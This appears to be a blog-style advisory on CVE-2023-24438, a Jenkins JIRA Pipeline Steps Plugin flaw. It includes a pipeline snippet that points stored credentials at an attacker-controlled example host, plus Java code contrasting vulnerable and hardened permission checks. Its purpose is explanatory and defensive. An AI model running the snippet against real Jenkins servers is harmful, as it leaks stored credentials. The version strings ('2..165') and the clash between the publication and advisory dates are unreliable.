CVE-2023-24438 - Jenkins JIRA Pipeline Steps Plugin Unauthorized Access to Credentials

The security vulnerability CVE-2023-24438 affects Jenkins JIRA Pipeline Steps Plugin, specifically the version 2..165.v8846cf59f3db and earlier. This vulnerability, caused by a missing permission check, allows attackers to gain unauthorized access to credentials stored in Jenkins. In this blog post, we'll take a deep dive into the details of this vulnerability, explore an example code snippet, offer links to original references, and provide a brief analysis of the exploit's impact.

Vulnerability Details

The Jenkins JIRA Pipeline Steps Plugin is widely used to integrate Jenkins with Atlassian JIRA, providing a set of pipeline steps that communicate with the JIRA REST API. According to the Jenkins Advisory [1], the plugin developers failed to implement a necessary permission check that would prevent attackers with Overall/Read permission from accessing stored Jenkins credentials.

By exploiting this vulnerability, an attacker can connect to a URL specified by them using credentials IDs they have obtained through other means, such as social engineering or another vulnerability. Consequently, the security of sensitive information stored in Jenkins can be compromised, leading to potentially harmful consequences for the affected organization.

Here's an example code snippet that demonstrates the vulnerability:

pipeline {
  agent any
  stages {
    stage('Connect to JIRA') {
      steps {
        script {
          // Site definition supplied by the attacker: their own JIRA URL paired
          // with a credentials ID they have learned through other means.
          def jiraSite = [
              'url': 'https://attacker-controlled-jira.example.com',
              'credentialsId': 'compromised_credentials_id'
          ]
          // The step connects to that URL using the referenced stored credential.
          jiraGetIssue idOrKey: 'JIRA-123', site: jiraSite
        }
      }
    }
  }
}


In the example above, the attacker has provided a URL for their rogue JIRA instance (https://attacker-controlled-jira.example.com) and a compromised credentials ID ('compromised_credentials_id'). The script, using these parameters, will then connect to the attacker-controlled JIRA site, potentially revealing sensitive information to the attacker.
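To show what "missing permission check" means on the server side, here is an added illustration (not the plugin's own source) of a Jenkins descriptor's form-validation endpoint in its vulnerable shape beside a hardened version; the class name, method names and the connect helper are hypothetical.

```java
import com.cloudbees.plugins.credentials.CredentialsMatchers;
import com.cloudbees.plugins.credentials.CredentialsProvider;
import com.cloudbees.plugins.credentials.common.StandardUsernamePasswordCredentials;
import hudson.model.Item;
import hudson.security.ACL;
import hudson.util.FormValidation;
import java.util.Collections;
import jenkins.model.Jenkins;
import org.kohsuke.stapler.AncestorInPath;
import org.kohsuke.stapler.QueryParameter;
import org.kohsuke.stapler.verb.POST;

/** Hypothetical descriptor fragment (not the plugin's source) backing a "Validate" button. */
public class JiraSiteValidationExample {
    // Vulnerable shape: Stapler exposes this as .../doValidateVulnerable?url=...&credentialsId=...
    // with no permission check, so any user with Overall/Read can make Jenkins use a
    // stored credential against a URL of their choosing.
    public FormValidation doValidateVulnerable(@QueryParameter String url, @QueryParameter String credentialsId) {
        return connect(url, lookup(credentialsId, null));
    }
    // Hardened shape: require POST and the permission needed to configure the site
    // before any credential is resolved or any outbound connection is made.
    @POST
    public FormValidation doValidate(@AncestorInPath Item item, @QueryParameter String url,
                                     @QueryParameter String credentialsId) {
        if (item == null) {
            Jenkins.get().checkPermission(Jenkins.ADMINISTER);   // global configuration page
        } else {
            item.checkPermission(Item.CONFIGURE);                // folder/job-scoped site
        }
        StandardUsernamePasswordCredentials c = lookup(credentialsId, item);
        if (c == null) {
            return FormValidation.error("No credentials found with ID " + credentialsId);
        }
        return connect(url, c);
    }
    private static StandardUsernamePasswordCredentials lookup(String id, Item item) {
        return CredentialsMatchers.firstOrNull(
            CredentialsProvider.lookupCredentials(StandardUsernamePasswordCredentials.class,
                item, ACL.SYSTEM, Collections.emptyList()),
            CredentialsMatchers.withId(id));
    }
    // Hypothetical helper: the real plugin would issue the JIRA REST request here.
    private static FormValidation connect(String url, StandardUsernamePasswordCredentials c) {
        return c == null ? FormValidation.error("Unknown credentials ID")
                         : FormValidation.ok("Would connect to " + url + " as " + c.getUsername());
    }
}
```

The hardened method refuses the request with an HTTP 403 from checkPermission before any credential lookup happens, which is the property an auditor should confirm on every do* method that touches credentials.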

Original References

The vulnerability was reported as a security issue in the Jenkins project's bug tracker and has been assigned CVE-2023-24438 by the National Vulnerability Database (NVD) [2]:

1. Jenkins Advisory: https://www.jenkins.io/security/advisory/2023-02-15/
2. NVD - CVE-2023-24438 Detail: https://nvd.nist.gov/vuln/detail/CVE-2023-24438

Mitigation

The Jenkins project has provided a fix for this vulnerability in the Jenkins JIRA Pipeline Steps Plugin version 2..166.v6306301f70ce or later [3]. Users running an earlier version of the plugin are urged to update as soon as possible to remediate the risk of unauthorized access to credentials.

3. Plugin Release Information: https://github.com/jenkinsci/JiraPipelineStepsPlugin/releases/tag/jira-steps-2..166.v6306301f70ce

Exploit Analysis

The existence of this vulnerability highlights the importance of rigorous and thorough security assessment in Jenkins plugin development. Attackers who have obtained credentials IDs through other means can use this vulnerability to access valuable and sensitive information, such as login credentials, API keys, and secret tokens.

This exploit also demonstrates how vulnerable plugins can pose a serious security risk to Jenkins users. As Jenkins is a popular automation server, the potential for damage extends to the projects and services using the Jenkins server.

In conclusion, CVE-2023-24438 is a critical vulnerability that emphasizes the need for stringent security measures to protect sensitive information in Jenkins. All users of the JIRA Pipeline Steps Plugin should immediately update to the patched version to mitigate the risk. Additionally, developers should adopt security best practices during the development process to prevent such vulnerabilities in the future.

Timeline

Published on: 01/26/2023 21:18:00 UTC
Last modified on: 02/04/2023 02:06:00 UTC